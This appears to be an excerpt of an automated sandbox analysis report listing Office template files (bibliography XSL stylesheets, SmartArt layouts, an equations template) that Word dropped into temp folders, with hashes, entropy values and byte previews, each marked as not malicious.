                                                                                                                                                        SHA1:352469A1ABB8DA1DC550D7E27924E552B0D39204
                                                                                                                                                        SHA-256:1D4483830710EF4A2CC173C3514A9F4B0ACA6C44DB22729B7BE074D18C625BAE
                                                                                                                                                        SHA-512:8B7DB2AB339DD8085104855F847C48970C2DD32ADB0B8EEA134A64C5CC7DE772615F85D057F4357703B65166C8CF0C06F4F6FD3E60FFC80DA3DD34B16D5B1281
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.n.a.m.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E32.tmp\gostname.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):255948
                                                                                                                                                        Entropy (8bit):5.103631650117028
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:gwprAm795vtfb8p4bgWPWEtTmtcRCDPThNPFQwB+26RxlsIBkAgRMBHcTCwsHe5a:kW
                                                                                                                                                        MD5:9888A214D362470A6189DEFF775BE139
                                                                                                                                                        SHA1:32B552EB3C73CD7D0D9D924C96B27A86753E0F97
                                                                                                                                                        SHA-256:C64ED5C2A323C00E84272AD3A701CAEBE1DCCEB67231978DE978042F09635FA7
                                                                                                                                                        SHA-512:8A75FC2713003FA40B9730D29C786C76A796F30E6ACE12064468DD2BB4BF97EF26AC43FFE1158AB1DB06FF715D2E6CDE8EF3E8B7C49AA1341603CE122F311073
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>............<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt".xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>..........<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select=

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E75.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):256
                                                                                                                                                        Entropy (8bit):3.464918006641019
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXR+EqRGRnRE3QepmlJ0+3FbnKfZObdADxp1RDWlVwv:fxnyB+5RmRGHmD0wbnKYZAH+Vwv
                                                                                                                                                        MD5:93149E194021B37162FD86684ED22401
                                                                                                                                                        SHA1:1B31CAEBE1BBFA529092BE834D3B4AD315A6F8F1
                                                                                                                                                        SHA-256:50BE99A154A6F632D49B04FCEE6BCA4D6B3B4B7C1377A31CE9FB45C462D697B2
                                                                                                                                                        SHA-512:410A7295D470EC85015720B2B4AC592A472ED70A04103D200FA6874BEA6A423AF24766E98E5ACAA3A1DBC32C44E8790E25D4611CD6C0DBFFFE8219D53F33ACA7
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .E.q.u.a.t.i.o.n.s...d.o.t.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.W.D. .D.o.c.u.m.e.n.t. .P.a.r.t.s.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E75.tmp\Equations.dotx

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft Word 2007+
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):51826
                                                                                                                                                        Entropy (8bit):5.541375256745271
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:384:erH5dYPCA4t3aEFGiSUDtYfEbi5Ry/AT7/6tHODaFlDSomurYNfT4A0VIwWNS89u:Q6Cbh9tENyWdaFUSYNfZS89/3qtEu
                                                                                                                                                        MD5:2AB22AC99ACFA8A82742E774323C0DBD
                                                                                                                                                        SHA1:790F8B56DF79641E83A16E443A75A66E6AA2F244
                                                                                                                                                        SHA-256:BC9D45D0419A08840093B0BF4DCF96264C02DFE5BD295CD9B53722E1DA02929D
                                                                                                                                                        SHA-512:E5715C0ECF35CE250968BD6DE5744D28A9F57D20FD6866E2AF0B2D8C8F80FEDC741D48F554397D61C5E702DA896BD33EED92D778DBAC71E2E98DCFB0912DE07B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........R.@c}LN4...........[Content_Types].xml ...(.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.....D....>.V...f-}..r9....=..Mn..U..5.(.....a...E..b....*..w.$...,O_fu."[P..WU=.;.....5..wdt..y1.......i.44-.r....;./.biG.Cd.n.j.{/......V....c..^^.E.H?H.........B.........<...Ae.l.]..{....mK......B....

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E86.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):254
                                                                                                                                                        Entropy (8bit):3.4845992218379616
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXQFoElh/lE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8lLGHmD0+dAH/luWvv
                                                                                                                                                        MD5:E8B30D1070779CC14FBE93C8F5CF65BE
                                                                                                                                                        SHA1:9C87F7BC66CF55634AB3F070064AAF8CC977CD05
                                                                                                                                                        SHA-256:2E90434BE1F6DCEA9257D42C331CD9A8D06B848859FD4742A15612B2CA6EFACB
                                                                                                                                                        SHA-512:C0D5363B43D45751192EF06C4EC3C896A161BB11DBFF1FC2E598D28C644824413C78AE3A68027F7E622AF0D709BE0FA893A3A3B4909084DF1ED9A8C1B8267FCA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .H.e.x.a.g.o.n.R.a.d.i.a.l...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7E86.tmp\HexagonRadial.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):6024
                                                                                                                                                        Entropy (8bit):7.886254023824049
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:bGa2onnLYHTSSxpHVTSH1bywZKmpRqiUtFvS9xrPooBpni6eDa16MUELHsrKjRBA:SJonLYzSSr1TuZNwtFZKpiiyrKXuCUd
                                                                                                                                                        MD5:20621E61A4C5B0FFEEC98FFB2B3BCD31
                                                                                                                                                        SHA1:4970C22A410DCB26D1BD83B60846EF6BEE1EF7C4
                                                                                                                                                        SHA-256:223EA2602C3E95840232CACC30F63AA5B050FA360543C904F04575253034E6D7
                                                                                                                                                        SHA-512:BDF3A8E3D6EE87D8ADE0767918603B8D238CAE8A2DD0C0F0BF007E89E057C7D1604EB3CCAF0E1BA54419C045FC6380ECBDD070F1BB235C44865F1863A8FA7EEA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK........2..<..]#.....'......diagrams/layout1.xml.].r.8...V.;0.;..aO........{.....V..3].d{..............\. .#.t... ........x<...@7o.]..7.N..@.NF..../....S.../.xC..U...<..Q.=...|..v.....cQ..Y=.....i`.. ..?.;...Go....x.O.$....7s..0..qg....|..r..l.w.a..p.3.Em7v...N............3..7...N.\\..f...9...U$..7...k.C..M.@\.s....G/..?...I...t.Yos...p..z...6.lnqi.6..<..1qg+......#]....|C/N..K\}.....#..".

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EC5.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):242
                                                                                                                                                        Entropy (8bit):3.4938093034530917
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUX44lWWoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyvToGHmD0+dAH/luWvv
                                                                                                                                                        MD5:A6B2731ECC78E7CED9ED5408AB4F2931
                                                                                                                                                        SHA1:BA15D036D522978409846EA682A1D7778381266F
                                                                                                                                                        SHA-256:6A2F9E46087B1F0ED0E847AF05C4D4CC9F246989794993E8F3E15B633EFDD744
                                                                                                                                                        SHA-512:666926612E83A7B4F6259C3FFEC3185ED3F07BDC88D43796A24C3C9F980516EB231BDEA4DC4CC05C6D7714BA12AE2DCC764CD07605118698809DEF12A71F1FDD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .T.a.b.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EC5.tmp\TabList.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4888
                                                                                                                                                        Entropy (8bit):7.8636569313247335
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:StrFZ23/juILHPzms5UTuK9CuZGEoEuZ28H1HiGa2RnnLY+tUb:SPZQ7uCHPzms5UTlqauZVHdJRnLY+tUb
                                                                                                                                                        MD5:0A4CA91036DC4F3CD8B6DBF18094CF25
                                                                                                                                                        SHA1:6C7EED2530CD0032E9EEAB589AFBC296D106FBB9
                                                                                                                                                        SHA-256:E5A56CCB3B3898F76ABF909209BFAB401B5DDCD88289AD43CE96B02989747E50
                                                                                                                                                        SHA-512:7C69426F2250E8C84368E8056613C22977630A4B3F5B817FB5EA69081CE2A3CA6E5F93DF769264253D5411419AF73467A27F0BB61291CCDE67D931BD0689CB66
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........e.>.......]>......diagrams/layout1.xmlz........Z..6....;..{......lw.E.o....i..T....&...G.+...$..(.6..>Y.pf8C.|3.?..m....xA8v.`.hW..@..Zn..(kb..(.......`.+....Y`...\..qh.0.!&w..)|...<..]Q.. _....m..Z.{3..~..5..R..d..A.O....gU.M..0..#...;.>$...T......T..z.Z.\a.+...?#.~.....1.>?...*..DD.1...'..,..(...5B...M..]..>.C..<[....,L.p..Q.v.v^q.Y...5.~^c..5........3.j.......BgJ.nv.. ............tt......Q..p..K....(M.(]@..E..~z.~...8...49.t.Q..Q.n..+.....*J.#J.... .P...P.1...!.#&...?A..&.."..|..D.I...:.....~/.....b..].........nI7.IC.a..%...9.....4...r....b..q....@o........O...y...d@+~.<.\....f.a`:...Qy/^..P....[....@i.I.._.?.X.x.8....)..s....I.0...|.....t...;...q=k.=..N.%!.(.1....B.Ps/."...#.%..&...j<..2x.=<.......s.....h..?..]?Y?...C.}E.O........{..6.d....I...A.....JN..w+....2..m>9.T7...t.6.}.i..f.Ga..t.].->...8U......G.D`......p..f.. ...qT.YX.t.F..X.u=.3r...4....4Q.D..l.6.+PR...+..T..h: H.&.1~....n.....)........2J.. O.W+vd..f....0.....6..9QhV..

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EC6.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):262
                                                                                                                                                        Entropy (8bit):3.4901887319218092
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXqhBMl0OoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxnyiMl0OoGHmD0+dAH/luWvv
                                                                                                                                                        MD5:52BD0762F3DC77334807DDFC60D5F304
                                                                                                                                                        SHA1:5962DA7C58F742046A116DDDA5DC8EA889C4CB0E
                                                                                                                                                        SHA-256:30C20CC835E912A6DD89FD1BF5F7D92B233B2EC24594F1C1FE0CADB03A8C3FAB
                                                                                                                                                        SHA-512:FB68B1CF9677A00D5651C51EC604B61DAC2D250D44A71D43CD69F41F16E4F0A7BAA7AD4A6F7BB870429297465A893013BBD7CC77A8F709AD6DB97F5A0927B1DD
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .R.a.d.i.a.l.P.i.c.t.u.r.e.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EC6.tmp\RadialPictureList.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):5596
                                                                                                                                                        Entropy (8bit):7.875182123405584
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:dGa2unnLYEB2EUAPOak380NQjqbHaPKJebgrEVws8Vw+BMa0EbdLVQaZJgDZh0pJ:UJunLYEB2EUAxk3pIYaScgYwsV4bdS0X
                                                                                                                                                        MD5:CDC1493350011DB9892100E94D5592FE
                                                                                                                                                        SHA1:684B444ADE2A8DBE760B54C08F2D28F2D71AD0FA
                                                                                                                                                        SHA-256:F637A67799B492FEFFB65632FED7815226396B4102A7ED790E0D9BB4936E1548
                                                                                                                                                        SHA-512:3699066A4E8A041079F12E88AB2E7F485E968619CB79175267842846A3AD64AA8E7778CBACDF1117854A7FDCFB46C8025A62F147C81074823778C6B4DC930F12
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK.........T.>................[Content_Types].xmlz.........=N.1...b.Eko(.B....(.Pp..=.u.?.....#q..ND.!$.J{.o....G..[Cv.....+.R.Nx..........0."u..S...$&.....Je..B..x......m......M^z....f....|...N..Q..z.!.- .2.9y.i.8j...........0.AE..p.s~@../jw.#8.I.#....4.~Cl.:#h..f.PU.s.~........(.)F..Y......^x..PK.........T.>...V....L......._rels/.rels...J.@.._e..]AD.....x....3.t..T.w.\ZpA<x......v..'....z.........Y..[...<..2.TT....Q$.!.=.....&C....b".F.q.7...X3...7.8.N.}.. ?..8...#..,.L.3.#e...wZpZ.]S..:....t.....{..6.7.|..,dH.e..K 7-}.~.v...5.......b..PK.........V.<.S.....Y.......diagrams/layout1.xml.\.r.8...U....m.$.."3.....;...../3.XAn..O.?....V.;...")Nr.O.H....O......_..E..S...L7....8H.y<=............~...Ic......v9.X.%.\.^.,?g.v.?%w...f.).9.........Ld;.1..?~.%QQ...h.8;.gy..c4..]..0Ii.K&.[.9.......E4B.a..?e.B..4....E.......Y.?_&!.....i~..{.W..b....L.?..L..@.F....c.H..^..i...(d.......w...9..9,........q..%[..]K}.u.k..V.%.Y.....W.y..;e4[V..u.!T...).%.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EC7.tmp\BracketList.glox

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:Microsoft OOXML
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):4026
                                                                                                                                                        Entropy (8bit):7.809492693601857
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:96:VpDCBFLhxaUGm5EWA07yNdKH1FQpy8tnX8Iz3b7TrT502+fPD:VpDYFFRMNU+RtXzLf35t+3D
                                                                                                                                                        MD5:5D9BAD7ADB88CEE98C5203883261ACA1
                                                                                                                                                        SHA1:FBF1647FCF19BCEA6C3CF4365C797338CA282CD2
                                                                                                                                                        SHA-256:8CE600404BB3DB92A51B471D4AB8B166B566C6977C9BB63370718736376E0E2F
                                                                                                                                                        SHA-512:7132923869A3DA2F2A75393959382599D7C4C05CA86B4B27271AB9EA95C7F2E80A16B45057F4FB729C9593F506208DC70AF2A635B90E4D8854AC06C787F6513D
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:PK........YnB;.h......F.......[Content_Types].xmlz.........MN.0...by.b.,.BI...X `...{..O.S...H\.'.XTP..K{.o.....rg..bL...XM.:.v..c.k...}.D....9.....Bb>.+..G.......+(.u}.w.]...v..{.M&.].>`....nB..B0Z@.e.u..R.......-.&#....aR..`.a..|. 1^......&..|..s.A.t..b..A.i7...7.&....bQK$O.......9....V....Wt_PK........bnB;?.......f......._rels/.rels...J.1.._%..f....m/.,x...&.lt.dV.y.|.."v....q..|......r..F..)..;.T5g.eP..O..Z.^-.8...<.Y....Q.."....*D.%.!9.R&#".'0(.u}).!..l....b..J..rr....P.L.w..0.-......A..w..x.7U...Fu<mT.....^s...F./ ..( .4L..`.....}...O..4.L...+H.z...m..j[].=........oY}.PK........J.L6...m....,.......diagrams/layout1.xml.X.n.8.}N.....PG.............wZ.,.R.%.K...J.H]....y.3..9...O..5."J.1.\.1....Q....z......e.5].)...$b.C)...Gx!...J3..N..H...s....9.~...#..$...W.8..I`|..0xH}......L.|..(V;..1...kF..O=...j...G.X.....T.,d>.w.Xs.......3L.r..er\o..D..^....O.F.{:.>.R'....Y-...B.P.;....X.'c...{x*.M7..><l.1.w..{].46.>.z.E.J.......G......Hd..$..7....E.

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7EC7.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):250
                                                                                                                                                        Entropy (8bit):3.4916022431157345
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXsAl8xoE3QepmlJ0+hdADryMluyS6Bkls0Lwv:fxny8A8xoGHmD0+dAH/luWvv
                                                                                                                                                        MD5:1A314B08BB9194A41E3794EF54017811
                                                                                                                                                        SHA1:D1E70DB69CA737101524C75E634BB72F969464FF
                                                                                                                                                        SHA-256:9025DD691FCAD181D5FD5952C7AA3728CD8A2CAF20DEA14930876419BED9B379
                                                                                                                                                        SHA-512:AB29C8674A85711EABAE5F9559E9048FE91A2F51EB12D5A46152A310DE59F759DF8C617DA248798A7C20F60E26FBB1B0FC8DB47C46B098BCD26CF8CE78989ACA
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .B.r.a.c.k.e.t.L.i.s.t...g.l.o.x.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.\.S.m.a.r.t.A.r.t. .G.r.a.p.h.i.c.s.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7ED8.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):288
                                                                                                                                                        Entropy (8bit):3.523917709458511
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXC1l8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnySvNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:4A9A2E8DB82C90608C96008A5B6160EF
                                                                                                                                                        SHA1:A49110814D9546B142C132EBB5B9D8A1EC23E2E6
                                                                                                                                                        SHA-256:4FA948EEB075DFCB8DCA773A3F994560C69D275690953625731C4743CD5729F7
                                                                                                                                                        SHA-512:320B9CC860FFBDB0FD2DB7DA7B7B129EEFF3FFB2E4E4820C3FBBFEA64735EB8CFE1F4BB5980302770C0F77FF575825F2D9A8BB59FC80AD4C198789B3D581963B
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .c.h.i.c.a.g.o...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7ED8.tmp\chicago.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):296658
                                                                                                                                                        Entropy (8bit):5.000002997029767
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:RwprAMk0qvtfL/vF/bkWPz9yv7EOMBPitjASjTQQr7IwR0TnyDkJb78plJwf33iV:M
                                                                                                                                                        MD5:9AC6DE7B629A4A802A41F93DB2C49747
                                                                                                                                                        SHA1:3D6E929AA1330C869D83F2BF8EBEBACD197FB367
                                                                                                                                                        SHA-256:52984BC716569120D57C8E6A360376E9934F00CF31447F5892514DDCCF546293
                                                                                                                                                        SHA-512:5736F14569E0341AFB5576C94B0A7F87E42499CEC5927AAC83BB5A1F77B279C00AEA86B5F341E4215076D800F085D831F34E4425AD9CFD52C7AE4282864B1E73
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>....<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:msxsl="urn:schemas-microsoft-com:xslt" xmlns:b="http://schemas.openxmlformats.org/officeDocument/2006/bibliography" xmlns:t="http://www.microsoft.com/temp">...<xsl:output method="html" encoding="us-ascii"/>............<xsl:template match="*" mode="outputHtml2">.....<xsl:apply-templates mode="outputHtml"/>.....</xsl:template>.....<xsl:template name="StringFormatDot">....<xsl:param name="format" />....<xsl:param name="parameters" />.... <xsl:variable name="prop_EndChars">.. <xsl:call-template name="templ_prop_EndChars"/>.. </xsl:variable>.... <xsl:choose>.....<xsl:when test="$format = ''"></xsl:when>.....<xsl:when test="substring($format, 1, 2) = '%%'">......<xsl:text>%</xsl:text>......<xsl:call-template name="StringFormatDot">.......<xsl:with-param name="format" select="substring($format, 3)" />.......<xsl:with-param name="parameters" select="$para

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7ED9.tmp\Content.inf

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:data
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):292
                                                                                                                                                        Entropy (8bit):3.5026803317779778
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6:fxnxUXC89ADni8ME3QepmlJ0+3FbnKfZObdADryMluxHZypwwyv:fxnyf9ADiNGHmD0wbnKYZAH/lMZqiv
                                                                                                                                                        MD5:A0D51783BFEE86F3AC46A810404B6796
                                                                                                                                                        SHA1:93C5B21938DA69363DBF79CE594C302344AF9D9E
                                                                                                                                                        SHA-256:47B43E7DBDF8B25565D874E4E071547666B08D7DF4D736EA8521591D0DED640F
                                                                                                                                                        SHA-512:CA3DB5A574745107E1D6CAA60E491F11D8B140637D4ED31577CC0540C12FDF132D8BC5EBABEA3222F4D7BA1CA016FF3D45FE7688D355478C27A4877E6C4D0D75
                                                                                                                                                        Malicious:false
                                                                                                                                                        Preview:[.F.i.l.e.].....O.r.i.g.i.n.a.l.N.a.m.e.:. .g.o.s.t.t.i.t.l.e...x.s.l.....C.o.m.p.o.n.e.n.t.:. .W.o.r.d.F.i.l.e.s.....R.e.q.V.e.r.:. .1.4.....E.x.e.c.u.t.a.b.l.e.:. .{.W.D.}.....S.t.o.r.e.L.o.c.a.t.i.o.n.:. .{.M.y. .T.e.m.p.l.a.t.e.s.}.....C.o.m.m.a.n.d.:. ./.f. .{.F.i.l.e.P.a.t.h.}.........

                                                                                                                                                        C:\Users\user\AppData\Local\Temp\TCD7ED9.tmp\gosttitle.xsl

                                                                                                                                                        Download File
                                                                                                                                                        Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                        Category:dropped
                                                                                                                                                        Size (bytes):251032
                                                                                                                                                        Entropy (8bit):5.102652100491927
                                                                                                                                                        Encrypted:false
                                                                                                                                                        SSDEEP:6144:hwprA5R95vtfb8p4bgWPwW6/m26AnV9IBgIkqm6HITUZJcjUZS1XkaNPQTlvB2zr:JA
                                                                                                                                                        MD5:F425D8C274A8571B625EE66A8CE60287
                                                                                                                                                        SHA1:29899E309C56F2517C7D9385ECDBB719B9E2A12B
                                                                                                                                                        SHA-256:DD7B7878427276AF5DBF8355ECE0D1FE5D693DF55AF3F79347F9D20AE50DB938
                                                                                                                                                        SHA-512:E567F283D903FA533977B30FD753AA1043B9DDE48A251A9AC6777A3B67667443FEAD0003765A630D0F840B6C275818D2F903B6CB56136BEDCC6D9BDD20776564
                                                                                                                                                        Malicious:false
